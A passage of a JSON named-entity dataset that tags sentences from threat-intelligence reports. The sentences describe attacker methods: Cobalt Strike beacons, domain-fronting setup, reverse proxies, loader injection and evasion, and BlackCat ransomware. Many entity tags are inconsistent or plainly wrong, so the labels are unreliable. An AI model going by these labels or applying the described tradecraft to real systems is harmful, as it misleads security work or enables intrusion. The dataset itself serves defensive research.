"manually", - "changed", - "by", - "the", - "actor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg" - ] - }, - { - "tokens": [ - "the", - "operators", - "were", - "able", - "to", - "access", - "their", - "primary", - "target", - "via", - "RDP", - "connections" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "operators", - "were", - "able", - "to", - "access", - "their", - "primary", - "target", - "via", - "RDP", - "connections", - "from", - "a", - "trusted", - "third", - "party", - "using", - "stolen", - "credentials" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "configured", - "to", - "proxy", - "C2", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "configured", - "to", - "proxy", - "C2", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "other", - "victim", - "networks", - "to", - "proxy", - "their", - "C2", - "instructions,", - "likely", - "to", - "minimize", - "the", - "risk", - "of", - "detection", - "and", - "blend", - "in", - "with", - "normal", - "network", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "acting", - "as", - "proxies", - "to", - "relay", - "communications", - "to", - "their", - "C2", - "servers." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "usually", - "to", - "the", - "victim’s", - "domain", - "name" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "read", - "and", - "decrypt", - "those", - "registry", - "key", - "values", - "for", - "proper", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "needs", - "to", - "read", - "and", - "decrypt", - "those", - "registry", - "key", - "values" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "obfuscate", - "the", - "source", - "of", - "the", - "activity." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "tool", - "called", - "“anti.exe”", - "to", - "stop", - "Windows", - "Update", - "service", - "and", - "terminate", - "EDR", - "and", - "Antivirus", - "related", - "services." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "leverages", - "spear-phishing", - "and", - "tries", - "to", - "trick", - "the", - "victims", - "into", - "opening", - "malicious", - "documents" - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "They", - "used", - "multiple", - "malicious", - "PDFs", - "and", - "MS", - "Office", - "documents", - "during", - "the", - "campaign." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "they", - "use", - "tools", - "such", - "as", - "Mimikatz", - "to", - "dump", - "credentials." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "remote", - "monitoring", - "software", - "such", - "as", - "ScreenConnect,", - "Remote", - "Utilities,", - "and", - "eHorus." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "they", - "added", - "a", - "new", - "tool", - "for", - "remote", - "access,", - "Syncro,", - "to", - "their", - "arsenal." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "disguises", - "itself", - "as", - "a", - "legitimate", - "Google", - "Update", - "executable." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "It", - "collects", - "the", - "victim’s", - "username" - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "computer", - "name" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "and", - "IP", - "address" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Domain", - "fronting", - "is", - "another", - "method", - "for", - "concealing", - "communication", - "between", - "the", - "endpoint", - "and", - "the", - "command", - "and", - "control", - "servers." - ], - "ner_tags": [ - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "purpose", - "of", - "domain", - "fronting", - "is", - "to", - "connect", - "to", - "a", - "restricted", - "host", - "while", - "pretending", - "to", - "communicate", - "with", - "an", - "allowed", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "masks", - "your", - "traffic", - "to", - "a", - "certain", - "website", - "by", - "masquerading", - "it", - "as", - "a", - "different", - "domain." - ], - "ner_tags": [ - "I-Features", - "I-Features", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Domain", - "fronting", - "was", - "mostly", - "used", - "by", - "web", - "services", - "to", - "bypass", - "censorship", - "in", - "several", - "countries", - "that", - "restricted", - "traffic" - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp" - ] - }, - { - "tokens": [ - "attackers", - "have", - "started", - "using", - "this", - "technique", - "to", - "hide", - "their", - "malicious", - "infrastructure", - "behind", - "legitimate", - "domains" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting", - "possible", - "by", - "allowing", - "the", - "operators", - "to", - "configure", - "related", - "settings", - "via", - "the", - "malleable", - "C2", - "profiles" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Setup", - "the", - "CDN", - "service", - "to", - "create", - "a", - "new", - "CDN", - "endpoint", - "and", - "redirect", - "traffic", - "to", - "your", - "domain." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Identify", - "a", - "domain", - "that", - "uses", - "the", - "same", - "CDN", - "to", - "ensure", - "that", - "the", - "traffic", - "will", - "be", - "forwarded", - "to", - "the", - "correct", - "resource." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Setup", - "a", - "profile", - "to", - "facilitate", - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "legitimate", - "website", - "will", - "forward", - "the", - "traffic", - "through", - "the", - "CDN", - "to", - "the", - "original", - "destination", - "according", - "to", - "the", - "host", - "header." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "malleable", - "C2", - "profiles", - "are", - "configured", - "to", - "allow", - "domain", - "fronting", - "using", - "the", - "Fastly", - "and", - "AzureEdge", - "CDNs" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "domain", - "fronting", - "appears", - "to", - "be", - "used", - "by", - "threat", - "actors." - ], - "ner_tags": [ - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Attackers", - "can", - "use", - "legitimate", - "domains", - "that", - "are", - "registered", - "under", - "the", - "same", - "CDN", - "provider." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "HTTP/HTTPS", - "C2", - "traffic" - ], - "ner_tags": [ - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "communication", - "between", - "the", - "Beacon", - "and", - "the", - "Cobalt", - "Strike", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "other", - "compromised", - "host", - "running", - "the", - "parent", - "HTTP", - "Beacon" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTP", - "Parent", - "Beacon" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "customized", - "for", - "the", - "HTTP-POST", - "Block" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Encrypting", - "and", - "encoding", - "the", - "data", - "with", - "XOR", - "mask", - "and", - "random", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "use", - "their", - "beacon", - "sessions", - "to", - "establish", - "RDP", - "access" - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "attackers", - "was", - "to", - "establish", - "a", - "Remote", - "Desktop", - "session" - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "establishing", - "a", - "RDP", - "session,", - "including", - "the", - "ability", - "to", - "navigate", - "using", - "a", - "graphical", - "environment", - "and", - "easily", - "move", - "laterally", - "once", - "the", - "necessary", - "access", - "has", - "been", - "granted" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attacker’s", - "Kali", - "Linux", - "host", - "to", - "RDP", - "into", - "our", - "target’s", - "environment" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RDP", - "into", - "the", - "target", - "host" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Cobalt", - "Strike", - "beacon", - "acts", - "as", - "the", - "intermediary", - "to", - "facilitate", - "the", - "Remote", - "Desktop", - "session" - ], - "ner_tags": [ - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMB", - "beacons", - "open", - "a", - "local", - "port", - "on", - "the", - "target", - "host", - "and", - "listen", - "for", - "incoming", - "communication", - "from", - "a", - "parent", - "beacon" - ], - "ner_tags": [ - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SMB", - "beacons", - "are", - "mostly", - "used", - "to", - "make", - "network", - "detection", - "harder", - "and", - "to", - "get", - "access", - "to", - "isolated", - "systems", - "where", - "communication", - "to", - "the", - "internet", - "is", - "prohibited" - ], - "ner_tags": [ - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "SMB", - "Beacon", - "is", - "communicating", - "over", - "the", - "network", - "with", - "a", - "parent", - "Beacon", - "using", - "named", - "pipes." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "see", - "the", - "named", - "pipe", - "created", - "that", - "we", - "specified", - "on", - "the", - "Cobalt", - "Strike", - "interface", - "when", - "we", - "created", - "the", - "SMB", - "listener." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "RDP", - "into", - "the", - "target", - "host", - "using", - "reverse", - "proxy" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "using", - "reverse", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "reverse", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Reverse", - "Proxy", - "using", - "Cobalt", - "Strike", - "Beacon" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ability", - "to", - "run", - "a", - "SOCKS", - "proxy", - "server", - "on", - "the", - "team", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "enables", - "the", - "operators", - "to", - "setup", - "a", - "listening", - "port", - "and", - "leverage", - "it", - "to", - "relay", - "traffic", - "to", - "and", - "from", - "the", - "open", - "beacon", - "session" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "attackers", - "take", - "advantage", - "of", - "this", - "technique", - "using", - "proxychains" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "employ", - "proxychains", - "from", - "the", - "attacker’s", - "Kali", - "Linux", - "host" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "via", - "reverse", - "proxy." - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "can", - "be", - "configured", - "as", - "a", - "proxy" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "threat", - "actors", - "use", - "their", - "beacon", - "sessions", - "to", - "establish", - "RDP", - "access", - "through", - "a", - "reverse", - "proxy" - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "victim’s", - "hostname", - "is", - "captured", - "in", - "this", - "logon", - "event" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "the", - "command", - "systeminfo", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "it", - "took", - "148", - "packets", - "containing", - "DNS", - "requests", - "and", - "responses", - "to", - "finish", - "the", - "task", - "and", - "send", - "back", - "the", - "data", - "to", - "the", - "Cobalt", - "Strike", - "Server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "O" - ] - }, - { - "tokens": [ - "which", - "will", - "then", - "send", - "the", - "results", - "to", - "the", - "C2", - "server" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SSL", - "can", - "be", - "used", - "to", - "complicate", - "command-and-control", - "(C2)", - "traffic", - "analysis" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "replacing", - "an", - "early", - "call", - "instruction", - "to", - "their", - "malicious", - "code,", - "or", - "by", - "overwriting", - "the", - "entry", - "point", - "in", - "the", - "PE", - "header" - ], - "ner_tags": [ - "B-Way", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "unpack", - "any", - "additional", - "payloads," - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "HTTPS", - "and", - "other", - "protocols", - "built", - "on", - "SSL", - "have" - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "service", - "using", - "HTTPS" - ], - "ner_tags": [ - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SSL", - "encrypted", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TLS", - "encrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "detect", - "when", - "TLS", - "connections", - "are", - "being", - "initiated", - "and", - "log", - "the", - "symmetric", - "keys", - "generated", - "for", - "the", - "SSL/TLS", - "connection" - ], - "ner_tags": [ - "O", - "O", - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "TLS", - "traffic," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypt", - "network", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypted" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "HTTPS", - "traffic." - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "encrypt" - ], - "ner_tags": [ - "O" - ] - }, - { - "tokens": [ - "SSL", - "encrypted", - "traffic" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "TLS", - "encrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloads", - "the", - "next", - "stage", - "from", - "a", - "public", - "file", - "storage", - "service" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "embeds", - "the", - "next", - "stages", - "of", - "the", - "execution", - "inside", - "an", - "additional", - "file,", - "usually", - "an", - "XML", - "or", - "a", - "PDF", - "file." - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Tool", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "that", - "embeds", - "the", - "Crypter", - "with", - "the", - "payload." - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "actor", - "embeds", - "the", - "malicious", - "code", - "inside", - "different", - "legitimate", - "codes." - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "which", - "enables", - "an", - "HTTPS", - "connection." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Once", - "downloaded", - "and", - "executed,", - "the", - "malicious", - "installer", - "copies", - "its", - "compressed", - "files", - "into", - "a", - "newly", - "created", - "folder", - "with", - "a", - "legitimate-looking", - "name", - "(i.e.,", - "IIS", - "Application", - "Health", - "Monitor)", - "in", - "one", - "of", - "the", - "following", - "directory", - "paths:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "At", - "first", - "glance,", - "the", - "files", - "within", - "the", - "directory", - "may", - "seem", - "legitimate" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Write", - "a", - "registry", - "Run", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Write", - "a.lnk", - "file", - "in", - "the", - "startup", - "folder" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "registry", - "run", - "key", - "persistence", - "implementation" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Decryption", - "Shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Decryption", - "shellcode", - "has", - "three", - "main", - "tasks:", - "first,", - "it", - "extracts", - "the", - "Loader", - "shellcode", - "and", - "the", - "payload,", - "then", - "it", - "decrypts", - "them,", - "and", - "finally,", - "it", - "transfers", - "the", - "execution", - "to", - "the", - "decrypted", - "Loader", - "shellcode." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "shellcode", - "execution", - "flow" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Decryption", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "it", - "using", - "the", - "denoted", - "decryption", - "key" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "payload", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "encrypted", - "additional", - "shellcode" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "An", - "encrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "these", - "are", - "encrypted", - "and", - "split", - "inside", - "the", - "XML." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "user", - "will", - "be", - "encouraged", - "to", - "download", - "a", - "malicious", - "installer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "deceive", - "the", - "user", - "into", - "thinking", - "that", - "the", - "application", - "has", - "failed", - "to", - "execute,", - "even", - "as", - "it", - "silently", - "continues", - "the", - "malicious", - "execution", - "in", - "the", - "background." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "shellcode", - "is", - "to", - "inject", - "the", - "decrypted", - "payload", - "within", - "the", - "currently", - "running", - "process", - "(itself)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Loader", - "overwrites", - "the", - "current", - "PE", - "with", - "the", - "final", - "payload’s", - "PE" - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "It", - "does", - "so", - "by", - "copying", - "the", - "PE", - "headers", - "and", - "each", - "section", - "according", - "to", - "the", - "current", - "executable’s", - "base", - "address." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Loader", - "copies", - "the", - "new", - "PE", - "headers", - "to", - "the", - "base", - "address", - "and", - "each", - "section", - "to", - "the", - "relevant", - "location", - "according", - "to", - "the", - "IMAGE_SECTION_HEADER" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "import", - "address", - "table", - "and", - "relocation", - "table", - "of", - "the", - "newly", - "injected", - "PE." - ], - "ner_tags": [ - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "newly", - "injected", - "PE" - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Loader", - "removes", - "evidence", - "of", - "injection", - "by", - "using", - "the", - "following", - "methods:", - "Update", - "the", - "LDR", - "data", - "table", - "entry", - "to", - "match", - "the", - "injected", - "PE.", - "Remove", - "the", - "injected", - "PE", - "headers", - "from", - "memory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "disable", - "system", - "defenses" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "process", - "list", - "checked", - "is", - "as", - "follows" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "services", - "running", - "on", - "the", - "compromised", - "system", - "are", - "checked", - "against", - "the", - "following", - "list" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "credentials", - "also", - "allow", - "BlackCat", - "to", - "move", - "laterally", - "within", - "the", - "victim’s", - "system", - "and/or", - "network,", - "often", - "with", - "administrative", - "privileges." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "ransomware", - "to", - "deploy", - "additional", - "tools" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "such", - "as", - "Mimikatz" - ], - "ner_tags": [ - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "utilizes", - "a", - "unique", - "onion", - "domain" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - 